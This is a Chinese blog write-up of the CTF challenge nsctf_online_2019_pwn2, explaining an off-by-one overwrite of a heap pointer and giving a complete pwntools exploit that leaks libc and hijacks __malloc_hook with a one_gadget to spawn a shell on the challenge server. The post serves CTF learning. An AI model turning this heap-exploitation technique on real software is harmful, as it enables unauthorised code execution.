nsctf_online_2019_pwn2

最新推荐文章于 2023-12-13 23:34:15 发布
最新推荐文章于 2023-12-13 23:34:15 发布
阅读量177 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124081338
版权

nsctf_online_2019_pwn2

查看保护
在这里插入图片描述
简单题目
在这里插入图片描述
这里有一个off-by-one
在这里插入图片描述
在name下面是heap_ptr这个指针
攻击思路:因为update_name可以改heap_ptr的最后一个字节,所以利用好这个字节就可以改heap的地址,题目不难合理利用off-by-one即可,攻击手法可以看z1r0 's blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 28807)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = '6.exit\n'

def add(size):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Input the size', str(size))

def delete():
    r.sendlineafter(menu, '2')

def show():
    r.sendlineafter(menu, '3')

def update_name(name):
    r.sendlineafter(menu, '4')
    r.sendafter('Please input your name', name)

def edit(name):
    r.sendlineafter(menu, '5')
    r.sendlineafter('Input the note', name)

r.sendlineafter('Please input your name', 'aaaa')

add(0x90)
add(0x10)
update_name(b'a' * 0x30 + b'\x10')
delete()

add(0x20)
update_name(b'a' * 0x30 + b'\x40')

show()

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
one = [0x45226, 0x4526a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base
realloc = libc_base + libc.sym['realloc']

add(0x60)
delete()

add(0x70)
update_name(b'a' * 0x30 + b'\x40')

edit(p64(malloc_hook - 0x23))
add(0x60)
add(0x60)

edit(b'a' * (0x13 - 8) + p64(one_gadget) + p64(realloc + 0x10))

add(0x10)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
[BUUCTF] nsctf_online_2019_pwn2
zyxx_wjc的博客
03-17 422
[BUUCTF] nsctf_online_2019_pwn2 WP
(BUUCTF)nsctf_online_2019_pwn2(详细注释exp)
最新发布
xy1458214551的博客
12-13 149
BUUCTF的nsctf_online_2019_pwn2题解,带有详细注释
NSCTF-部分题目wp
1stPeak's Blog
09-08 2041
文章目录Web-xffWeb-sqlWeb-XXECRYPTO-神算子CRYPTO-Catch_the_pointCRYPTO-dataMISC-docxMISC-BBQMISC-xxencode+uuencode Web-xff 方法一: 方法二: Web-sql 解题思路: (1)dirsearch扫出备份文件 (2)分析文件 分析index.php文件: <?php require("conf/config.php"); if (isset($_REQUEST['id']))
宁波市第三届网络安全大赛(NSCTF)WP
zhwho的博客
07-12 2361
** 写在开头 从简书回来了,入坑简书半年,由于个人原因,简书账号注销了,以后就在CSDN上写啦 hhhh ** 前段时间和室友一起参加了这次NSCTF,做的题比较杂,WEB、MISC、密码,想着这几天会开环境给复现,现在看好像不给开环境,有的题保存下来了,这里先写写思路,有些截图没保存,以后有机会一定补上。 WEB 签到——本地访问 打开环境,印象里是有一句话: 只有本地管理员才能访问,你想越权访问吗? 这就很明显了,当然想越权访问,不然怎么拿flag?而拿flag的条件很明显有两个——1.本地 2.管理
第六届宁波市赛 [NSCTF2023] 部分web+部分misc+部分密码+mobile
Leaf_initial的博客
05-20 290
只有web,misc是我写的,剩下的都是队的师傅写的,我是飞舞,就这样。
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
0998_samp_gta_PWN_
10-02
samp开服的一个pwn 是地图的 一个酒吧
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
2018南宁ctf RE题目
12-18
2018年4道南宁CTF RE题目,有Windows逆向也有linux逆向
NSCTF(第六届宁波市赛) 部分web+密码
Jay17的博客
05-20 269
NSCTF(第六届宁波市赛) 部分web+密码
NSCTF测试平台MISC解题教程
tzyyyyyy的博客
11-17 518
NSCTF测试平台MISC解题教程 一些基础常见的杂项MISC题型
NSCTF测试平台Code Php解题思路
IT-Blog
07-08 1811
1、点击链接,页面显示如下: 2、结合hint1,首先打开控制台尝试寻找 3、访问code.txt,代码来啦 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1.
NSCTF-web题目writeup
cainsoftware的博客
10-01 994
Dream II 看题目提示的 仔细看用什么提示方式,页面进去提示了“put me a message then you can get the flag” 说明重点就是怎么把信息传过去,这里可以先测试GET POST请求会发现都不行 所以重点就是这个“PUT”这个词 所以用burpsuite 用PUT方式丢一个“message”的数据包得到如下图: 看了一眼觉得是base64加密 WECLOME 查看源代码找到了前面的flag 抓个包看一下 抓包拼接就可以获得flag...
ctf 绕过php,第三届NSCTF测试题Code php 之MD5碰撞和php strcmp函数绕过
weixin_36402765的博客
03-19 283
第三届NSCTF测试题Code php 之MD5碰撞和php strcmp函数绕过1、打开网页如图,F12发现code.txt:2、需要php代码审计,提示需要get方式提交3个参数(v1、v2、v3)且v1和v2的值不同,但md5后的值相同(中间是&&与符号),为真时再利用strcmp函数判断v3和$flag是否相同,为真输出flag;3、在问了几个朋友后,得到一些提示,首先MD...
NSCTF-ZJPC-MISC
weixin_45734980的博客
07-20 706
快乐的暑假开始嘞!由于太菜被送来学习CTF。第一天就从MISC开始吧[微笑] 1、音频分析 一听这段神奇的音频哔哔哔,就回忆起以前看谍战片的激情然后就不做题去看片了 就感觉像是某种加密。那就做音频分析吧。 想用audacity当然可以,但是菜鸡总想用少下点软件,比如用GoldWave和Pr[手动狗头]。 短长短长是不是很有节奏啊[滑稽],猜摩斯密码。一开始还以为是摩斯以后还干了其他事情,比如凯撒或者栅格之类的,然后看到40分笑了 百度一下对照分析得出答案(没说大小写hhh),或者根据哈夫曼树记住摩斯也行
CTF-【NSCTF 2015】WEB11 条件竞争
关注网络安全、云原生安全
12-21 4887
简介 条件竞争是指多进程/多线程情况下对于共享资源没有加锁,导致的问题。 源代码 <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>NSCTF</title> </head> <body alink="#007000" background="../images/dot.gif" bgcolor="#
NSCTF-ZJPC-Crypto
weixin_45734980的博客
07-22 401
编码和加密这两个东西, 需要数学基础我没有。还需要脑洞我也没有 :-< ,祝大家玩的开心:-) 1、签到 签到题划划水,盲猜各种编码形式都可以。不过没有“=”可不代表不是base64哦[滑稽] base64解码三次即可获得flag。 2、密码学 一个字母矩阵???可是第一行出现了F…L…A的字样就觉得眼熟。那就每隔两个取出来就好啦。不过取出的时候有一点小技巧:直接抄下来每三个换一行,就像这样 竖着读就能获取flag啦。(感谢二狗同学的提醒) 3、解密 最开始没有txt的时候,二狗同学猜是
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值